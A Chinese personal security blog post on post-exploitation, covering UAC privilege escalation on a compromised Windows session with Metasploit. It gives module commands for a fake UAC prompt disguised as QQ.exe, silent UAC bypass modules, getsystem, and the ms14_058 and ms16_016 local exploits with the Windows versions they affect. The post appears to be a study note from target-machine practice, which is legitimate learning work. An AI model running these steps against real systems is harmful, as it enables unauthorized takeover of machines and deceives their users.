User-Profile-Image
hankin
  • 5
请到[后台->外观->菜单]中设置菜单。
  • 分类
    • 靶机渗透
    • 计算机小技巧
    • 未分类
    • 数据结构
    • 内网渗透
    • 代码审计
    • XSS
    • WEB安全漏洞学习
    • Web
    • python
    • PHP
    • NodeJS
    • MYSQL
    • Misc
    • JavaScript
    • Docker
    • CTF相关知识点
    • CTFWP
    • Crypto
    • Cobalt Strike
  • 页面
  • 友链
    • 三哥的博客
    • Root师傅的博客
    • EDS师傅的博客
    • 天正哥的博客
    • 天尘翼师傅的博客
    • 熵增师傅的github
    • 信仰的博客
    • Jadore的博客
Help?

Please contact us on our email for need any support

Support
    首页   ›   内网渗透   ›   正文
内网渗透

后渗透学习二(UAC提权)

2020-01-13 08:24:52
60  0 0

UAC提权

当获得一个低权限的sessions时,这里是管理员权限,想进一步提升权限,可以使用UAC的方法,是因为此时无法通过getsystem直接提权

首先background让当前session后台运行
进入下面这个模块
use Exploit/windows/local/ask
set session (此时session对应id)
set filename QQ.exe(靶机上将要弹出的uac)
exploit
此时在靶机上出现一个exe文件可执行请求提醒,当点击是后,kali上会获得一个session

进入这个session

首先输入sessions查看所有获取到的session,然后进入对应会话session,命令是sessions -i (对应id)

执行getuid发现仍是管理员权限,但是不要担心,再次执行getsystem将获得system权限

但是这样的方式并不好,用户很明显可以看到这样的请求,稍微有些意识的用户都会拒绝点击,因此我们可以尝试bypass uac的方式,不与用户直接交互,而metasploit中就正好提供了这样的模块

MSF模块
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_vbs
我们这里就用bypassuac模块

只需设置session即可

set session (session为对应低权限的id)

我们也可以看到这个模块可以对32位和64位的电脑都有效

exploit后我们可以收到一个session,再次执行进入,重复上述提权步骤,将得到system权限(这里不放图了),而靶机那边没有任何反应

至此UACbypass提权成功

附加两个本地提权漏洞

利用本地提权漏洞
search ms14_058
use exploit/windows/local/ms14_058_track_popup_menu
设置session即可
exploit后得到session,这里都不用再执行getsystem的命令,直接得到system权限
可在winxp sp3,win2003 sp2,win7 sp1,win8 32位上执行
search ms16_016
use exploit/windows/local/ms16_016_webdav
设置session即可
exploit后得到session,这里都不用再执行getsystem的命令,直接得到system权限
可在win7 sp1上执行

​

评论 (0)

点击这里取消回复。

欢迎您 游客  

近期文章
  • SUCTF 2019 Guess_game
  • Python pickle反序列化
  • [安洵杯 2019]easy_serialize_php
  • Session反序列化
  • 原生类序列化
近期评论
    文章归档
    • 2021年1月
    • 2020年12月
    • 2020年11月
    • 2020年9月
    • 2020年7月
    • 2020年6月
    • 2020年5月
    • 2020年4月
    • 2020年3月
    • 2020年2月
    • 2020年1月
    分类目录
    • Cobalt Strike
    • Crypto
    • CTFWP
    • CTF相关知识点
    • Docker
    • JavaScript
    • Misc
    • MYSQL
    • NodeJS
    • PHP
    • python
    • Web
    • WEB安全漏洞学习
    • XSS
    • 代码审计
    • 内网渗透
    • 数据结构
    • 未分类
    • 计算机小技巧
    • 靶机渗透
    功能
    • 登录
    • 项目feed
    • 评论feed
    • WordPress.org
    分类目录
    Copyright © 2021 网站备案号: 蒙ICP备20000552号-1
    smarty_hankin 主题. Designed by hankin
    主页
    页面
    博主
    purplet 管理员
    努力并有所方向
    157 文章 0 评论 21185 浏览
    测试
    测试